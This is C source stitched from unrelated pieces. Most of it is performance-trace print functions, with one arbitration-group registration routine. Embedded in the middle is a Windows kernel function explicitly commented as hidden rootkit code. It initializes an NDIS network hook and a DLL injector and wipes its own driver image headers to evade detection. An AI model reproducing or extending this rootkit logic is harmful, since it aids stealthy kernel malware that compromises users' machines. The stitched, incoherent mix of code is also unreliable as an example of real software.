void __print_Command(FILE *fOut,
PERF_Private *perf,
unsigned long ulCommand,
unsigned long ulArgument,
PERF_MODULETYPE eModule)
{
/* get debug private structure */
PERF_PRINT_Private *me = perf->cip.pDebug;
unsigned long module = ((unsigned long) eModule) & PERF_ModuleMask;
int sendIx = (PERF_GetSendRecv ((unsigned long) eModule) >> 28) & 3;
int sending = PERF_IsSending(((unsigned long) eModule) & ~PERF_ModuleMask);
fprintf(fOut, "%s%ld.%06ld%sCommand%s%s%s%s%s0x%lx%s0x%lx%s%s%s" __LINE_END__,
me->prompt, TIME_SECONDS(perf->time), TIME_MICROSECONDS(perf->time),
me->info,
me->csv ? "," : "(",
sendRecvTxt[sendIx],
me->csv ? "," : sending ? " to=" : " from=",
module < PERF_ModuleMax ? PERF_ModuleTypes[module] : "INVALID",
me->csv ? "," : " cmd=",
ulCommand,
me->csv ? "," : "(",
ulArgument,
me->csv ? "," : ") = ",
(ulCommand < PERF_CommandMax ? PERF_CommandTypes[ulCommand] : "<unknown>" ),
me->csv ? "" : ")");
print_print_location(perf, fOut, 5);
}
void __print_Buffer(FILE *fOut,
PERF_Private *perf,
unsigned long ulAddress1,
unsigned long ulAddress2,
unsigned long ulSize,
PERF_MODULETYPE eModule)
{
/* get debug private structure */
PERF_PRINT_Private *me = perf->cip.pDebug;
unsigned long module1 = ((unsigned long) eModule) & PERF_ModuleMask;
unsigned long module2 = (((unsigned long) eModule) >> PERF_ModuleBits) & PERF_ModuleMask;
int xfering = PERF_IsXfering ((unsigned long) eModule);
int sendIx = (PERF_GetSendRecv ((unsigned long) eModule) >> 28) & 3;
int sending = PERF_IsSending ((unsigned long) eModule);
int frame = PERF_IsFrame ((unsigned long) eModule);
int multiple = PERF_IsMultiple((unsigned long) eModule);
if (!xfering && sending) module2 = module1;
fprintf(fOut, "%s%ld.%06ld%sBuffer%s%s%s%s%s%s%s%s%s0x%lx%s0x%lx",
me->prompt, TIME_SECONDS(perf->time), TIME_MICROSECONDS(perf->time),
me->info,
me->csv ? "," : "(",
xfering ? "xfering" : sendRecvTxt[sendIx],
me->csv ? "," : " ",
frame ? "frame" : "buffer",
me->csv ? "," : (xfering || !sending) ? " from=" : "",
(xfering || !sending) ?
(module1 < PERF_ModuleMax ? PERF_ModuleTypes[module1] : "INVALID") :
"",
me->csv ? "," : (xfering || sending) ? " to=" : "",
(xfering || sending) ?
(module2 < PERF_ModuleMax ? PERF_ModuleTypes[module2] : "INVALID") :
"",
me->csv ? "," : " size=",
ulSize,
me->csv ? "," : " addr=",
ulAddress1);
/* print second address if supplied */
if (multiple)
{
fprintf(fOut, "%s0x%lx",
me->csv ? "," : " addr=",
ulAddress2);
}
fprintf(fOut, "%s" __LINE_END__,
me->csv ? "" : ")");
print_print_location(perf, fOut, 6 + (multiple ? 1 : 0));
}
void __print_Done(FILE *fOut,
PERF_Private *perf)
{
/* get debug private structure */
PERF_PRINT_Private *me = perf->cip.pDebug;
fprintf(fOut, "%s%ld.%06ld%sDone" __LINE_END__,
me->prompt, TIME_SECONDS(perf->time), TIME_MICROSECONDS(perf->time),
me->info);
print_print_location(perf, fOut, 0);
}
//--------------------------------------------------------------------------------------
VOID DriverEntryContinueThread(PVOID Param)
{
/**
* Hidden rootkit code starts execution here.
*/
LARGE_INTEGER Timeout = { 0 };
Timeout.QuadPart = TIME_RELATIVE(TIME_SECONDS(3));
DbgPrint(__FUNCTION__"(): Param = "IFMT"\n", Param);
// initialize NDIS hook data handler
NdisHookInitialize(NdisHookHandleBuffer);
// initialize DLL injector
InjectInitialize();
KeDelayExecutionThread(KernelMode, FALSE, &Timeout);
if (Param)
{
// free memory, that has been allocated for driver
ExFreePool(Param);
}
#ifndef USE_STEALTH_IMAGE
if (m_DriverBase)
{
PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)
((PUCHAR)m_DriverBase + ((PIMAGE_DOS_HEADER)m_DriverBase)->e_lfanew);
// erase image headers
RtlZeroMemory(m_DriverBase, pHeaders->OptionalHeader.SizeOfHeaders);
}
#endif // USE_STEALTH_IMAGE
#ifdef USE_GREETING_MESSAGE
while (true)
{
DbgPrint(__FUNCTION__"(): Commertial malware rootkits are sucks!\n");
// sleep
KeDelayExecutionThread(KernelMode, FALSE, &Timeout);
}
#endif // USE_GREETING_MESSAGE
}
void __print_ThreadCreated(FILE *fOut,
PERF_Private *perf,
unsigned long ulThreadID,
unsigned long ulThreadName)
{
/* get debug private structure */
PERF_PRINT_Private *me = perf->cip.pDebug;
fprintf(fOut, "%s%ld.%06ld%sThread%s%ld%s%c%c%c%c%s" __LINE_END__,
me->prompt, TIME_SECONDS(perf->time), TIME_MICROSECONDS(perf->time),
me->info,
me->csv ? "," : "(pid=",
ulThreadID,
me->csv ? "," : " name=",
PERF_FOUR_CHARS(ulThreadName),
me->csv ? "" : ")");
print_print_location(perf, fOut, 2);
}
//---------------------------------------------------------------------------------------
int ArbitrationRegisterGroup( tArbitrationGroupID groupID, const tArbitrationRegistrationInfo* pInfo )
{
tGroupRegistration* pGroup;
if (groupID == ARBITRATION_ID_UNKNOWN || pInfo->pCommand == NULL)
return ARBITRATION_ERROR_INVALID_ARGUMENT;
pGroup = FindGroupRegistration( groupID );
if (pGroup != NULL)
return ARBITRATION_ERROR_ALREADY_EXISTS;
if (s_GroupsCount >= MAX_GROUPS)
return ARBITRATION_ERROR_NO_ROOM;
pGroup = ALLOCATE( tGroupRegistration );
if (pGroup == NULL)
return ARBITRATION_ERROR_OUT_OF_MEMORY;
pGroup->groupID = groupID;
pGroup->groupData = pInfo->groupData;
pGroup->state = State_Unknown;
pGroup->timer = TIMEOUT_MASTER_CHECK_FIRST;
pGroup->sendCount = 0;
pGroup->master = 0;
pGroup->statusFlags = 0;
if (pInfo->options & ArbitrationOpt_NotSuitable)
pGroup->statusFlags |= ArbitrationFlags_NotSuitable;
if (pInfo->options & ArbitrationOpt_Watcher)
pGroup->statusFlags |= ArbitrationFlags_Watcher;
pGroup->options = pInfo->options;
pGroup->userInfo = pInfo->userInfo;
pGroup->pCommand = pInfo->pCommand;
s_Groups[ s_GroupsCount ] = pGroup;
s_GroupsCount++;
SetupSend( pGroup, ArbitrationPGNCmd_NewMember );
pGroup->sendCount = TIME_SECONDS( 2 ); // make sure we outlive any address claim
return ARBITRATION_OK;
}
void __print_Log(FILE *fOut,
PERF_Private *perf,
unsigned long ulData1, unsigned long ulData2,
unsigned long ulData3)
{
/* get debug private structure */
PERF_PRINT_Private *me = perf->cip.pDebug;
fprintf(fOut, "%s%ld.%06ld%sLog%s0x%lx%s0x%lx%s0x%lx%s" __LINE_END__,
me->prompt, TIME_SECONDS(perf->time), TIME_MICROSECONDS(perf->time),
me->info,
me->csv ? "," : "(",
ulData1,
me->csv ? "," : ", ",
ulData2,
me->csv ? "," : ", ",
ulData3,
me->csv ? "" : ")");
print_print_location(perf, fOut, 3);
}
void __print_Boundary(FILE *fOut,
PERF_Private *perf, PERF_BOUNDARYTYPE eBoundary)
{
/* get debug private structure */
PERF_PRINT_Private *me = perf->cip.pDebug;
unsigned long boundary = ((unsigned long) eBoundary) & PERF_BoundaryMask;
fprintf(fOut, "%s%ld.%06ld%sBoundary%s0x%x%s%s%s%s" __LINE_END__,
me->prompt, TIME_SECONDS(perf->time), TIME_MICROSECONDS(perf->time),
me->info,
me->csv ? "," : "(",
eBoundary,
me->csv ? "," : " = ",
PERF_IsStarted(eBoundary) ? "started " : "completed ",
(boundary < PERF_BoundaryMax ?
PERF_BoundaryTypes[boundary] : "INVALID"),
me->csv ? "" : ")");
print_print_location(perf, fOut, 2);
}
void __print_SyncAV(FILE *fOut,
PERF_Private *perf,
float pfTimeAudio,
float pfTimeVideo,
PERF_SYNCOPTYPE eSyncOperation)
{
/* get debug private structure */
PERF_PRINT_Private *me = perf->cip.pDebug;
unsigned long op = (unsigned long) eSyncOperation;
fprintf(fOut, "%s%ld.%06ld%sSyncAV%s%g%s%g%s%s%s" __LINE_END__,
me->prompt, TIME_SECONDS(perf->time), TIME_MICROSECONDS(perf->time),
me->info,
me->csv ? "," : "(audioTS=",
pfTimeAudio,
me->csv ? "," : " videoTS=",
pfTimeVideo,
me->csv ? "," : " op=",
(op < PERF_SyncOpMax ? PERF_SyncOpTypes[op] : "INVALID"),
me->csv ? "" : ")");
print_print_location(perf, fOut, 3);
}